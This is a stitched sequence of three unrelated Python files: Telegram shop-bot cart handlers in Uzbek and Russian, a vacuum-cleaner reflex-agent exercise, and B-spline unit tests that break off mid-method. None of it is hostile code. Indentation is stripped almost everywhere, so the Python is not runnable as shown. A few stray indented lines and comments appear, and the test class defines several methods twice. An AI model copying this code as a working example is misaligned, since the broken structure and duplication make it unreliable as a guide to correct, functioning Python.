async def ortga_main_menu_uz(message: types.Message, state: FSMContext):
text = "Juda yaxshi birgalikda buyurtma beramizmi? 😃"
keyboard = menu_product_types_uz
await message.answer(text, reply_markup=keyboard)
await state.reset_state()
@dp.message_handler(lambda message: message.text.isdigit(), state=Customer_Form.amount)
async def amount_handler(message: types.Message, state: FSMContext):
user_id = message.from_user.id
amount = message.text
print("amount kirildi.")
await state.update_data({
"amount" : amount,
})
data = await state.get_data()
product_title = data.get("product")
amount = data.get("amount")
amount = int(amount)
product = session.query(Product).filter(Product.title == product_title).first()
customer = session.query(Customer).filter(Customer.customer_id == user_id).first()
lang = "uz" if customer.language == "🇺🇿O'zbekcha" else "eng"
if product in customer.products:
customer.products.remove(product)
session.commit()
customer_savat = savat.insert().values(customer_id=customer.customer_id, product_id=product.product_id, amount=amount)
session.execute(customer_savat)
session.commit()
text = {
"uz" : "Mahsulot tanlang",
"eng" : "Выберите продукт",
}
    # Changed: rebuild the keyboard with the product list
products = session.query(Product).all()
titles = [p.title for p in products]
if lang == "uz":
titles.append("⬅️Ortga")
else:
titles.append("⬅️Назад")
products_menu_uz = ReplyKeyboardMarkup(
keyboard = [
[
KeyboardButton(text="📥Savat"),
KeyboardButton(text="🚖Buyurtma berish")
],
],
row_width=2,
resize_keyboard=True
)
products_menu_uz.add(*(KeyboardButton(text=title) for title in titles))
products_menu_eng = ReplyKeyboardMarkup(
keyboard = [
[
KeyboardButton(text="📥Корзина"),
KeyboardButton(text="🚖Оформить заказ")
],
],
row_width=2,
resize_keyboard=True
)
products_menu_eng.add(*(KeyboardButton(text=title) for title in titles))
keyboard = products_menu_uz if lang == "uz" else products_menu_eng
await message.answer(text[lang], reply_markup=keyboard)
await state.reset_state()
await Customer_Form.product.set()
@dp.message_handler(Text(equals="⬅️Назад", ignore_case=True), state=Customer_Form.amount)
async def ortga_product_list_ru(message: types.Message, state: FSMContext):
await state.reset_state()
await Customer_Form.product.set()
products = session.query(Product).all()
titles = [p.title for p in products]
titles.append("⬅️Назад")
products_menu_eng = ReplyKeyboardMarkup(
keyboard = [
[
KeyboardButton(text="📥Корзина"),
KeyboardButton(text="🚖Оформить заказ")
],
],
row_width=2,
resize_keyboard=True
)
products_menu_eng.add(*(KeyboardButton(text=title) for title in titles))
await message.answer("Выберите продукт", reply_markup=products_menu_eng)
@dp.message_handler(Text(equals="⬅️Ortga", ignore_case=True), state=Customer_Form.amount)
async def ortga_product_list_uz(message: types.Message, state: FSMContext):
print("Ortga")
await state.reset_state()
await Customer_Form.product.set()
    # Changed: rebuild the keyboard with the product list
products = session.query(Product).all()
titles = [p.title for p in products]
titles.append("⬅️Ortga")
products_menu_uz = ReplyKeyboardMarkup(
keyboard = [
[
KeyboardButton(text="📥Savat"),
KeyboardButton(text="🚖Buyurtma berish")
],
],
row_width=2,
resize_keyboard=True
)
products_menu_uz.add(*(KeyboardButton(text=title) for title in titles))
await message.answer("Mahsulot tanlang", reply_markup=products_menu_uz)
@dp.message_handler(Text(equals="📥Корзина", ignore_case=True), state=Customer_Form.amount)
async def order_eng2(message: types.Message, state: FSMContext):
customer = session.query(Customer).filter(Customer.customer_id == message.from_user.id).first()
products = customer.products
if len(products) > 0:
titles = [p.title for p in products]
print(titles)
btn_text = ["⬅️Назад", "🔄Очистить"]
keyboard = ReplyKeyboardMarkup( row_width=1, resize_keyboard=True)
keyboard.add(*(KeyboardButton(text=f"❌ {p.title}") for p in products))
keyboard.row(*(KeyboardButton(text=f"{title}") for title in btn_text))
# keyboard.add(*(KeyboardButton(f"🚖Palce an order"),))
text = "📥Корзина\n\n"
i = 1
total_price = 0
records = session.query(savat, Customer).filter(Customer.customer_id==customer.customer_id, savat.c.customer_id == customer.customer_id).all()
for row in records:
product = session.query(Product).filter(Product.product_id==row.product_id).first()
text += f"<strong>{i}. {product.title}</strong>\n\n"
i +=1
total_price += int(row.amount) * int(product.price)
price = format(int(product.price),",d").replace(',', ' ')
amount_show = f"{int(row.amount) * int(product.price):,}".replace(',', ' ')
text+= f"{row.amount} x {price} = {amount_show} UZS\n\n"
total_price = f"{total_price:,}".replace(',', ' ')
text += f"<strong>Общий: </strong> {total_price} UZS"
await Customer_Form.savat.set()
await message.answer(text, reply_markup=keyboard)
else :
products = session.query(Product).all()
titles = [p.title for p in products]
titles.append("⬅️Назад")
products_menu_eng = ReplyKeyboardMarkup(
keyboard=[
[
KeyboardButton("📥Корзина"),
KeyboardButton("🚖Оформить заказ"),
],
],
row_width=2,
resize_keyboard=True,
)
products_menu_eng.add(*(KeyboardButton(title) for title in titles))
await message.answer("🗑 Ваша корзина пуста, чтобы сделать заказ выберите продукты", reply_markup=products_menu_eng)
await Customer_Form.product.set()
@dp.message_handler(Text(equals="📥Savat", ignore_case=True), state=Customer_Form.amount)
async def order_uz2(message: types.Message, state: FSMContext):
customer = session.query(Customer).filter(Customer.customer_id == message.from_user.id).first()
products = customer.products
if len(products) > 0:
titles = [p.title for p in products]
print(titles)
btn_text = ["⬅️Ortga", "🔄Tozalash"]
keyboard = ReplyKeyboardMarkup( row_width=1, resize_keyboard=True)
keyboard.add(*(KeyboardButton(text=f"❌ {p.title}") for p in products))
keyboard.row(*(KeyboardButton(text=f"{title}") for title in btn_text))
# keyboard.add(*(KeyboardButton(f"🚖Buyurtma berish"),))
text = "📥Savat\n\n"
i = 1
total_price = 0
records = session.query(savat, Customer).filter(Customer.customer_id==customer.customer_id, savat.c.customer_id == customer.customer_id).all()
for row in records:
product = session.query(Product).filter(Product.product_id==row.product_id).first()
text += f"<strong>{i}. {product.title}</strong>\n\n"
i +=1
total_price += int(row.amount) * int(product.price)
price = format(int(product.price),",d").replace(',', ' ')
amount_show = f"{int(row.amount) * int(product.price):,}".replace(',', ' ')
text+= f"{row.amount} x {price} = {amount_show} so'm\n\n"
total_price = f"{total_price:,}".replace(',', ' ')
text += f"<strong>Umumiy: </strong> {total_price} so'm"
await Customer_Form.savat.set()
await message.answer(text, reply_markup=keyboard)
else :
products = session.query(Product).all()
titles = [p.title for p in products]
titles.append("⬅️Ortga")
products_menu_uz = ReplyKeyboardMarkup(
keyboard=[
[
KeyboardButton("📥Savat"),
KeyboardButton("🚖Buyurtma berish"),
],
],
row_width=2,
resize_keyboard=True,
)
products_menu_uz.add(*(KeyboardButton(title) for title in titles))
await message.answer("🗑 Sizning savatingiz bo'sh, buyrutma berish uchun mahsulot tanlang", reply_markup=products_menu_uz)
await Customer_Form.product.set()
@dp.message_handler(Regexp(r"^🔄Tozalash$"), state=Customer_Form.savat)
async def clear_savat_uz(message: types.Message, state: FSMContext):
user_id = message.from_user.id
customer = session.query(Customer).filter(Customer.customer_id == user_id).first()
customer.products.clear()
session.commit()
text = "Juda yaxshi birgalikda buyrutma beramizmi? 😃"
print(f"{customer.username} savatini tozaladi {customer.products}")
products = session.query(Product).all()
titles = [p.title for p in products]
titles.append("⬅️Ortga")
products_menu_uz = ReplyKeyboardMarkup(
keyboard=[
[
KeyboardButton("📥Savat"),
KeyboardButton("🚖Buyurtma berish"),
],
],
row_width=2,
resize_keyboard=True,
)
products_menu_uz.add(*(KeyboardButton(title) for title in titles))
await message.answer(text, reply_markup=products_menu_uz)
await Customer_Form.product.set()
@dp.message_handler(Regexp(r"^🔄Очистить$"), state=Customer_Form.savat)
async def clear_savat_ru(message: types.Message, state: FSMContext):
user_id = message.from_user.id
customer = session.query(Customer).filter(Customer.customer_id == user_id).first()
customer.products.clear()
session.commit()
text = "😃 Привет, оформим вместе заказ?"
print(f"{customer.username} cleared his savat {customer.products}")
products = session.query(Product).all()
titles = [p.title for p in products]
titles.append("⬅️Назад")
products_menu_eng = ReplyKeyboardMarkup(
keyboard=[
[
KeyboardButton("📥Корзина"),
KeyboardButton("🚖Оформить заказ"),
],
],
row_width=2,
resize_keyboard=True,
)
products_menu_eng.add(*(KeyboardButton(title) for title in titles))
await message.answer(text, reply_markup=products_menu_eng)
await Customer_Form.product.set()
@dp.message_handler(lambda message : message.text in ["❌ " + p.title for p in session.query(Product).all()], state=Customer_Form.savat)
async def order_handler(message: types.Message, state : FSMContext):
user_id = message.from_user.id
title = message.text.replace("❌ ", "")
print("title: ", title)
customer = session.query(Customer).filter(Customer.customer_id == user_id).first()
language = customer.language
lang = "uz" if language == "🇺🇿O'zbekcha" else "eng"
text = {
"uz" : "Juda yaxshi birgalikda buyrutma beramizmi? 😃",
"eng" : "😃 Привет, оформим вместе заказ?",
}
products = session.query(Product).all()
titles = [p.title for p in products]
if lang == "uz":
titles.append("⬅️Ortga")
else :
titles.append("⬅️Назад")
products_menu_uz = ReplyKeyboardMarkup(
keyboard=[
[
KeyboardButton("📥Savat"),
KeyboardButton("🚖Buyurtma berish"),
],
],
row_width=2,
resize_keyboard=True,
)
products_menu_eng = ReplyKeyboardMarkup(
keyboard=[
[
KeyboardButton("📥Корзина"),
KeyboardButton("🚖Оформить заказ"),
],
],
row_width=2,
resize_keyboard=True,
)
products_menu_uz.add(*(KeyboardButton(title) for title in titles))
products_menu_eng.add(*(KeyboardButton(title) for title in titles))
keyboard = products_menu_uz if lang == "uz" else products_menu_eng
product = session.query(Product).filter(Product.title == title).first()
print(product in customer.products)
customer.products.remove(product)
session.commit()
await message.answer(text[lang], reply_markup=keyboard)
await Customer_Form.product.set()
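
# A hedged sketch of how a handlers module like this is typically started in
# an aiogram 2.x project; `dp` is this project's Dispatcher from loader.py.
from aiogram import executor

if __name__ == "__main__":
    # Long-poll Telegram; handlers registered above via @dp.message_handler
    # are dispatched automatically.
    executor.start_polling(dp, skip_updates=True)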

# === main.py | HxnDev/Reflex-Agent-to-Solve-Vaccuum-Cleaner-World-Problem | MIT ===
# These are pre-defined knowledge for my agent
goalState = {'A' : '0' , 'B' : '0' , 'C' : '0'}
action = 0 # 0 = Clean , 1 = Dirty
cost = 0
roomStates = {'A' : '0' , 'B' : '0' , 'C' : '0'}
#initial input
print ("Enter the starting location of vacuum (A/B/C) = ")
location = input()
print()
for room in roomStates:
action = input("Enter the state of " + room + " (0 for clean /1 for dirty): ")
roomStates[room] = action
#General Outputs
print()
print("\nCurrent State: " + str(roomStates))
print("\nGoal state: " + str(goalState))
print("\n Vacuum is placed in location " + location)
if (roomStates != goalState):
    #If the starting location is room A
    # (note: when A starts dirty, this branch cleans A and stops; it does not
    # continue to B or C even if they are also dirty)
if (location == 'A'):
if (roomStates['A'] == '1'): #if dirty
roomStates['A'] = '0'
cost+=1
print("Location A was dirty\nLocation A has been cleaned\nCost for cleaning is 1.")
if (roomStates == goalState):
print("Goal state has been met.")
print("\nPerformance Measurement: " + str(cost))
#If A is clean. Going from A -> B
else:
print("\nA is clean")
print("\nA -> B")
print("\nCost for moving within rooms = 1")
cost+=1
if (roomStates['B'] == '1'):#If B is dirty
roomStates['B'] = '0'
cost+=1
print("Location B was dirty\nLocation B has been cleaned\nCost for cleaning is 1.")
if (roomStates == goalState):
print("Goal state has been met.")
print("\nPerformance Measurement: " + str(cost))
#As goal state wasn't met, this means that room C is dirty
else:
print("\nA and B are clean but C is dirty")
print("\nB -> C")
print("\nCost for moving within rooms = 1")
cost+=1
roomStates['C'] = '0'
cost+=1
print("Location C was dirty\nLocation C has been cleaned\nCost for cleaning is 1.")
if (roomStates == goalState):
print("Goal state has been met.")
print("\nPerformance Measurement: " + str(cost))
#If the starting location is room B
elif (location == "B"):
if(roomStates['B'] == '1'): #B is dirty
roomStates['B'] = '0'
cost+=1
print("Location B was dirty\nLocation B has been cleaned\nCost for cleaning is 1.")
if (roomStates == goalState):
print("Goal state has been met.")
print("\nPerformance Measurement: " + str(cost))
#If B is clean, then we will move to A first
else:
print("\nB is clean")
print("\nB -> A")
print("\nCost for moving within rooms = 1")
cost+=1
if(roomStates['A'] == '1'): #A is dirty
roomStates['A'] = '0'
cost+=1
print("Location A was dirty\nLocation A has been cleaned\nCost for cleaning is 1.")
if (roomStates == goalState):
print("Goal state has been met.")
print("\nPerformance Measurement: " + str(cost))
# As goal state failed, it means that C is still dirty. We will now move from A->B and then B->C
else:
print("\nA is clean")
print("\nA -> B")
print("\nCost for moving within rooms = 1")
cost+=1
print("\nB is also clean")
print("\nB -> C")
print("\nCost for moving within rooms = 1")
cost+=1
roomStates['C'] = '0'
cost+=1
print("Location C was dirty\nLocation C has been cleaned\nCost for cleaning is 1.")
if (roomStates == goalState):
print("Goal state has been met.")
print("\nPerformance Measurement: " + str(cost))
elif(roomStates['C'] == '1'): #C is Dirty
roomStates['C'] = '0'
cost+=1
print("Location C was dirty\nLocation C has been cleaned\nCost for cleaning is 1.")
if (roomStates == goalState):
print("Goal state has been met.")
print("\nPerformance Measurement: " + str(cost))
# As goal state failed, it means that A is still dirty. We will now move from C->B and then B->A
else:
print("\nC is clean")
print("\nC -> B")
print("\nCost for moving within rooms = 1")
cost+=1
print("\nB is also clean")
print("\nB -> A")
print("\nCost for moving within rooms = 1")
cost+=1
roomStates['A'] = '0'
cost+=1
print("Location A was dirty\nLocation A has been cleaned\nCost for cleaning is 1.")
if (roomStates == goalState):
print("Goal state has been met.")
print("\nPerformance Measurement: " + str(cost))
#If the starting location is room C
elif(location == 'C'):
if (roomStates['C'] == '1'): #if dirty
roomStates['C'] = '0'
cost+=1
print("Location C was dirty\nLocation C has been cleaned\nCost for cleaning is 1.")
if (roomStates == goalState):
print("Goal state has been met.")
print("\nPerformance Measurement: " + str(cost))
#If C is clean. Going from C -> B
else:
print("\nC is clean")
print("\nC -> B")
print("\nCost for moving within rooms = 1")
cost+=1
if (roomStates['B'] == '1'):#If B is dirty
roomStates['B'] = '0'
cost+=1
print("Location B was dirty\nLocation B has been cleaned\nCost for cleaning is 1.")
if (roomStates == goalState):
print("Goal state has been met.")
print("\nPerformance Measurement: " + str(cost))
#As goal state wasn't met, this means that room A is dirty
else:
print("\nB and C are clean but A is dirty")
print("\nB -> A")
print("\nCost for moving within rooms = 1")
cost+=1
roomStates['A'] = '0'
cost+=1
print("Location A was dirty\nLocation A has been cleaned\nCost for cleaning is 1.")
if (roomStates == goalState):
print("Goal state has been met.")
print("\nPerformance Measurement: " + str(cost))
else:
print("\nInvalid Start Location")
else:
print("\nAll rooms are already clean")
print("\nPerformance Measurement: " + str(cost))

# === aslam_nonparametric_estimation/bsplines_python/test/BSplineTests.py | bhirschel/kalibr | BSD-4-Clause ===
#!/usr/bin/env python
import roslib; roslib.load_manifest('bsplines');
import bsplines
import numpy
import scipy.interpolate.fitpack as fp
import scipy.integrate as si
import sys
import unittest
def createUniformKnotBSpline(order,segments,dim,knotSpacing=1.0):
aspl = bsplines.BSpline(order)
kr = aspl.numKnotsRequired(segments)
kc = aspl.numCoefficientsRequired(segments);
# Choose a uniform knot sequence.
knots = numpy.linspace(0.0,kr - 1, kr)*knotSpacing
cp = numpy.random.random([dim,kc])
aspl.setKnotVectorAndCoefficients(knots, cp)
return (aspl,(knots,cp,order-1))
def createExponentialKnotBSpline(order,segments,dim,knotSpacing=1.0):
aspl = bsplines.BSpline(order)
kr = aspl.numKnotsRequired(segments)
kc = aspl.numCoefficientsRequired(segments);
# Choose a uniform knot sequence.
knots = numpy.zeros(kr)
for i in range(0,kr):
knots[i] = knotSpacing * 2**i
cp = numpy.random.random([dim,kc])
aspl.setKnotVectorAndCoefficients(knots, cp)
return (aspl,(knots,cp,order-1))
def createRandomKnotBSpline(order,segments,dim):
aspl = bsplines.BSpline(order)
kr = aspl.numKnotsRequired(segments)
kc = aspl.numCoefficientsRequired(segments);
# Choose a uniform knot sequence.
knots = numpy.random.random(kr)*10
knots.sort()
cp = numpy.random.random([dim,kc])
aspl.setKnotVectorAndCoefficients(knots, cp)
return (aspl,(knots,cp,order-1))
def createRandomRepeatedKnotBSpline(order,segments,dim):
aspl = bsplines.BSpline(order)
kr = aspl.numKnotsRequired(segments)
kc = aspl.numCoefficientsRequired(segments);
# Choose a uniform knot sequence.
knots = numpy.random.random(kr)*10
knots.sort()
for i in range(0,len(knots)):
if i&1:
knots[i-1] = knots[i]
cp = numpy.random.random([dim,kc])
aspl.setKnotVectorAndCoefficients(knots, cp)
return (aspl,(knots,cp,order-1))
class BSplineTestCase(unittest.TestCase):
def runTest(self):
x=0
def assertMatricesEqual(self,M1, M2, tolerance, msg):
d1 = numpy.array(M1.shape)
d2 = numpy.array(M2.shape)
self.assertEqual(d1.size,d2.size)
for i in range(0,d1.size):
self.assertEqual(M1.shape[i], M2.shape[i])
md = numpy.max(numpy.abs(M1 - M2))
self.assertTrue(md < tolerance, msg= "The matrices\n%s\nand\n%s\nwere not equal to within tolerance %e [%e > %e]: %s" % (M1,M2,tolerance,md,tolerance, msg))
class TestBSplines(BSplineTestCase):
def test_bounds(self):
numpy.random.seed(3)
for order in range(2,10):
A = createUniformKnotBSpline(order,3,1);
aspl = A[0]
# Now, test that the bounds checking works.
# These shouldn't raise an exception.
aspl.eval(aspl.t_min())
aspl.eval(aspl.t_max())
# These boundary cases should.
self.assertRaises(RuntimeError, lambda: aspl.eval(aspl.t_min() - 1e-15))
self.assertRaises(RuntimeError, lambda: aspl.eval(aspl.t_max() + 1e-15))
aspl.eval(aspl.t_max() - 1e-15)
def test_init(self):
numpy.random.seed(5)
# Test the initialization from two times and two positions.
p_0 = numpy.array([1,2,3]);
p_1 = numpy.array([2,4,6]);
t_0 = 0.0
t_1 = 0.1
dt = t_1 - t_0
v = (p_1 - p_0)/dt
for order in range(2,10):
aspl = bsplines.BSpline(order)
#print "order: %d" % order
#print "p_0: %s" % p_0
#print "p_1: %s" % p_1
# Initialize the spline with these two times
aspl.initSpline(t_0,t_1,p_0,p_1);
b_0 = aspl.eval(t_0)
b_1 = aspl.eval(t_1)
v_0 = aspl.evalD(t_0,1)
v_1 = aspl.evalD(t_1,1)
#print "b_0: %s" % b_0
#print "b_1: %s" % b_1
for j in range(0,p_0.size):
# Keep the threshold low for even power cases.
self.assertAlmostEqual(p_0[j],b_0[j],places=2)
self.assertAlmostEqual(p_1[j],b_1[j],places=2)
self.assertAlmostEqual(v_0[j],v[j],places=2)
self.assertAlmostEqual(v_1[j],v[j],places=2)
def test_time_interval(self):
numpy.random.seed(6)
# Test two functions:
for order in range(2,10):
A = createUniformKnotBSpline(order,3,3)
aspl = A[0]
# Check that the time interval function works.
ti = aspl.timeInterval()
self.assertEqual(ti[0], aspl.t_min())
self.assertEqual(ti[1], aspl.t_max())
# Check that the individual segment time interval function works
for i in range(0,3):
ti = aspl.timeInterval(i)
self.assertEqual(ti[0], order - 1 + i)
self.assertEqual(ti[1], order + i)
def test_new_segment(self):
numpy.random.seed(7)
# This function tests adding a new segment to the curve.
for order in range(2,10):
# Create a spline with two segments
aspl = bsplines.BSpline(order)
kr = aspl.numKnotsRequired(order + 1)
kc = aspl.numCoefficientsRequired(order + 1);
# Choose a uniform knot sequence.
knots = numpy.linspace(0.0,kr - 1, kr)
cp = numpy.random.random(kc);
# build a vector-valued spline
cpa = numpy.array([cp,cp*cp,cp*cp*cp])
aspl.setKnotVectorAndCoefficients(knots, cpa)
# Store a reference spline that doesn't get modified.
aspl_ref = bsplines.BSpline(order)
aspl_ref.setKnotVectorAndCoefficients(knots,cpa)
# Now add a segment to the spline.
ti = aspl.timeInterval()
# the current set of knots is uniformly spaced with spacing 1.0
# Let's muck around with that.
t_k = ti[1] + 0.5
p_k = numpy.array([1.0,2.0,3.0]);
aspl.addCurveSegment(t_k,p_k);
# This function doesn't necessarily preserve the existing curve. It
# does, however, preserve the curve at ti[0] (all derivatives) and
# interpolate the value at ti[1]. Verify this.
# For all derivatives at ti[0]
for d in range(0,order):
# Evaluate the new curve and the reference curve
ref_p = aspl_ref.evalD(ti[0],d)
p = aspl.evalD(ti[0],d)
#print "[%f %f] S^%d(%f,%d) = %s, %s" % (ti[0], ti[1], order,t,d,ref_p,p)
# Check that they are almost equal
for i in range(0,p.size):
self.assertAlmostEqual(p[i],ref_p[i], msg="[%f %f] S^%d(%f,%d) = %s, %s" % (ti[0], ti[1], order,ti[0],d,ref_p,p))
# Now check that it interpolates the position at ti[1]
# Evaluate the new curve and the reference curve
ref_p = aspl_ref.evalD(ti[1],0)
p = aspl.evalD(ti[1],0)
# Check that they are almost equal
for i in range(0,p.size):
self.assertAlmostEqual(p[i],ref_p[i], msg="[%f %f] S^%d(%f,%d) = %s, %s" % (ti[0], ti[1], order,ti[1],d,ref_p,p))
# Now check that the curve interpolates p_k at t_k
curve_p_k = aspl.evalD(t_k,0)
for i in range(0,p.size):
self.assertAlmostEqual(p_k[i],curve_p_k[i], msg="[%f %f] S^%d(%f,%d) = %s, %s" % (ti[0], ti[1], order,t_k,d,ref_p,p))
def test_remove_segment(self):
numpy.random.seed(8)
for order in range(2,10):
# Create a spline with two segments
aspl = bsplines.BSpline(order)
kr = aspl.numKnotsRequired(order + 1)
kc = aspl.numCoefficientsRequired(order + 1);
# Choose a uniform knot sequence.
knots = numpy.linspace(0.0,kr - 1, kr)
cp = numpy.random.random(kc);
# build a vector-valued spline
cpa = numpy.array([cp,cp*cp,cp*cp*cp])
aspl.setKnotVectorAndCoefficients(knots, cpa)
# Store a reference spline that doesn't get modified.
aspl_ref = bsplines.BSpline(order)
aspl_ref.setKnotVectorAndCoefficients(knots,cpa)
# Now remove a curve segment
aspl.removeCurveSegment()
# Check that the knot sequence is good.
ref_knots = aspl_ref.knots()
knots = aspl.knots()
self.assertEqual(knots.size,ref_knots.size - 1)
for i in range(0,knots.size):
self.assertEqual(knots[i],ref_knots[i+1])
# Check that the time range is still good.
self.assertEqual(aspl.t_min(),aspl_ref.timeInterval(0)[1])
# Check that the coefficients survived.
ref_coeff = aspl_ref.coefficients()
coeff = aspl.coefficients()
self.assertEqual(coeff.shape[1], ref_coeff.shape[1] - 1)
for r in range(0,coeff.shape[0]):
for c in range(0,coeff.shape[1]):
self.assertEqual(coeff[r,c], ref_coeff[r,c+1], msg="Order %s, coeff[%d,%d] %f != %f\n%s\n%s" % (order, r,c,coeff[r,c], ref_coeff[r,c+1],coeff,ref_coeff))
# Now we check that the curve still evaluates well.
            for t in numpy.arange(aspl.t_min(), aspl.t_max(), 0.01):
for d in range(0,order):
# Exactly equal...not approximately equal.
self.assertEqual(aspl.evalD(t,d),aspl_ref.evalD(t,d))
def test_uniform(self):
numpy.random.seed(1)
for order in range(2,10):
aspl = bsplines.BSpline(order)
kr = aspl.numKnotsRequired(3)
kc = aspl.numCoefficientsRequired(3);
# Choose a uniform knot sequence.
knots = numpy.linspace(0.0,kr*1.0, kr)
cp = numpy.random.random([kc])
cpa = numpy.array([cp])
aspl.setKnotVectorAndCoefficients(knots, cpa)
fspl = (knots,cp,order-1)
for i in numpy.linspace(aspl.t_min(),aspl.t_max()-1e-15,10):
f = fp.spalde(float(i),fspl)
a = aspl.eval(i)
for j in range(0,f.shape[0]):
a = aspl.evalD(i,j)
self.assertAlmostEqual(a, f[j])
def test_repeated(self):
numpy.random.seed(2)
for order in range(2,10):
aspl = bsplines.BSpline(order)
kr = aspl.numKnotsRequired(3)
kc = aspl.numCoefficientsRequired(3);
# Make a knot sequence that is all zeros at one end and all ones at the other.
knots = numpy.zeros(kr)
for i in range(0,knots.size):
if i >= knots.size * 0.5:
knots[i] = 1.0
cp = numpy.random.random([kc])
cpa = numpy.array([cp])
aspl.setKnotVectorAndCoefficients(knots, cpa)
fspl = (knots,cp,order-1)
for i in numpy.linspace(aspl.t_min(),aspl.t_max()-1e-15,10):
f = fp.spalde(float(i),fspl)
a = aspl.eval(i)
for j in range(0,f.shape[0]):
a = aspl.evalD(i,j)
self.assertAlmostEqual(a, f[j])
def test_random(self):
numpy.random.seed(3)
for order in range(2,10):
aspl = bsplines.BSpline(order)
kr = aspl.numKnotsRequired(3)
kc = aspl.numCoefficientsRequired(3);
knots = numpy.random.random([kr]) * 10
knots.sort()
cp = numpy.random.random([kc])
cpa = numpy.array([cp])
aspl.setKnotVectorAndCoefficients(knots, cpa)
fspl = (knots,cp,order-1)
for i in numpy.linspace(aspl.t_min(),aspl.t_max(),10):
f = fp.spalde(float(i),fspl)
a = aspl.eval(i)
for j in range(0,f.shape[0]):
a = aspl.evalD(i,j)
self.assertAlmostEqual(a, f[j])
def test_phi_c(self):
numpy.random.seed(4)
# Test that the linear algebra of Phi(t) * c is equivalent to the evaluation
# of the spline curve at t: b(t)
for order in range(2,10):
aspl = bsplines.BSpline(order)
kr = aspl.numKnotsRequired(3)
kc = aspl.numCoefficientsRequired(3);
# Choose a uniform knot sequence.
knots = numpy.linspace(0.0,kr*1.0, kr)
cp = numpy.linspace(1.0,kc,kc)
# build a vector-valued spline
cpa = numpy.array([cp,cp*cp,cp*cp*cp])
aspl.setKnotVectorAndCoefficients(knots, cpa)
for t in numpy.linspace(aspl.t_min(),aspl.t_max(),10):
for i in range(0,order):
# Check that Phi(t) c(t) = s(t)
s = aspl.evalD(t,i)
Phi = aspl.Phi(t,i)
c = aspl.localCoefficientVector(t)
sprime = numpy.dot(Phi,c)
for j in range(0,sprime.size):
self.assertAlmostEqual(s[j],sprime[j])
def test_U_B_c(self):
numpy.random.seed(4)
# Test that the linear algebra of Phi(t) * c is equivalent to the evaluation
# of the spline curve at t: b(t)
for order in range(2,10):
aspl = bsplines.BSpline(order)
kr = aspl.numKnotsRequired(3)
kc = aspl.numCoefficientsRequired(3);
# Choose a uniform knot sequence.
knots = numpy.linspace(0.0,kr*1.0, kr)
cp = numpy.linspace(1.0,kc,kc)
# build a vector-valued spline
cpa = numpy.array([cp,cp*cp,cp*cp*cp])
aspl.setKnotVectorAndCoefficients(knots, cpa)
for t in numpy.linspace(aspl.t_min(),aspl.t_max(),10):
for i in range(0,order):
# Check that Phi(t) c(t) = s(t)
s = aspl.evalD(t,i)
U = aspl.U(t,i)
M = aspl.Mi(aspl.segmentIndex(t))
c = aspl.localCoefficientVector(t)
sprime = numpy.dot(U.T,numpy.dot(M,c))
for j in range(0,sprime.size):
self.assertAlmostEqual(s[j],sprime[j])
def test_U_D_B_c(self):
numpy.random.seed(4)
# Test that the linear algebra of Phi(t) * c is equivalent to the evaluation
# of the spline curve at t: b(t)
for order in range(2,10):
aspl = bsplines.BSpline(order)
kr = aspl.numKnotsRequired(3)
kc = aspl.numCoefficientsRequired(3);
# Choose a uniform knot sequence.
knots = numpy.linspace(0.0,kr*1.0, kr)
cp = numpy.linspace(1.0,kc,kc)
# build a vector-valued spline
cpa = numpy.array([cp,cp*cp,cp*cp*cp])
aspl.setKnotVectorAndCoefficients(knots, cpa)
for t in numpy.linspace(aspl.t_min(),aspl.t_max(),10):
for i in range(0,order):
# Check that Phi(t) c(t) = s(t)
s = aspl.evalD(t,i)
U = aspl.U(t,0)
M = aspl.Mi(aspl.segmentIndex(t))
D = aspl.Di(aspl.segmentIndex(t))
# Evaluate the derivative as matrix multiplication
for d in range(0,i):
M = numpy.dot(D,M)
c = aspl.localCoefficientVector(t)
sprime = numpy.dot(U.T,numpy.dot(M,c))
for j in range(0,sprime.size):
self.assertAlmostEqual(s[j],sprime[j])
    # The four tests below redefine (and therefore shadow) the earlier
    # test_init, test_time_interval, test_new_segment and test_remove_segment;
    # only these later definitions actually run.
    def test_init(self):
numpy.random.seed(5)
# Test the initialization from two times and two positions.
p_0 = numpy.array([1,2,3]);
p_1 = numpy.array([2,4,6]);
t_0 = 0.0
t_1 = 0.1
dt = t_1 - t_0
v = (p_1 - p_0)/dt
for order in range(2,10):
aspl = bsplines.BSpline(order)
#print "order: %d" % order
#print "p_0: %s" % p_0
#print "p_1: %s" % p_1
# Initialize the spline with these two times
aspl.initSpline(t_0,t_1,p_0,p_1);
b_0 = aspl.eval(t_0)
b_1 = aspl.eval(t_1)
v_0 = aspl.evalD(t_0,1)
v_1 = aspl.evalD(t_1,1)
#print "b_0: %s" % b_0
#print "b_1: %s" % b_1
for j in range(0,p_0.size):
# Keep the threshold low for even power cases.
self.assertAlmostEqual(p_0[j],b_0[j],places=2)
self.assertAlmostEqual(p_1[j],b_1[j],places=2)
self.assertAlmostEqual(v_0[j],v[j],places=2)
self.assertAlmostEqual(v_1[j],v[j],places=2)
def test_time_interval(self):
numpy.random.seed(6)
# Test two functions:
for order in range(2,10):
nSegments = 3
aspl = bsplines.BSpline(order)
kr = aspl.numKnotsRequired(nSegments)
kc = aspl.numCoefficientsRequired(nSegments);
# Choose a uniform knot sequence at 0.0, 1.0, ...
knots = numpy.linspace(0.0,kr-1, kr)
cp = numpy.linspace(1.0,kc,kc)
# build a vector-valued spline
cpa = numpy.array([cp,cp*cp,cp*cp*cp])
aspl.setKnotVectorAndCoefficients(knots, cpa)
# Check that the time interval function works.
ti = aspl.timeInterval()
self.assertEqual(ti[0], aspl.t_min())
self.assertEqual(ti[1], aspl.t_max())
# Check that the individual segment time interval function works
for i in range(0,3):
ti = aspl.timeInterval(i)
self.assertEqual(ti[0], order - 1 + i)
self.assertEqual(ti[1], order + i)
def test_new_segment(self):
numpy.random.seed(7)
# This function tests adding a new segment to the curve.
for order in range(2,10):
# Create a spline with two segments
aspl = bsplines.BSpline(order)
kr = aspl.numKnotsRequired(order + 1)
kc = aspl.numCoefficientsRequired(order + 1);
# Choose a uniform knot sequence.
knots = numpy.linspace(0.0,kr - 1, kr)
cp = numpy.random.random(kc);
# build a vector-valued spline
cpa = numpy.array([cp,cp*cp,cp*cp*cp])
aspl.setKnotVectorAndCoefficients(knots, cpa)
# Store a reference spline that doesn't get modified.
aspl_ref = bsplines.BSpline(order)
aspl_ref.setKnotVectorAndCoefficients(knots,cpa)
# Now add a segment to the spline.
ti = aspl.timeInterval()
# the current set of knots is uniformly spaced with spacing 1.0
# Let's muck around with that.
t_k = ti[1] + 0.5
p_k = numpy.array([1.0,2.0,3.0]);
aspl.addCurveSegment(t_k,p_k);
# This function doesn't necessarily preserve the existing curve. It
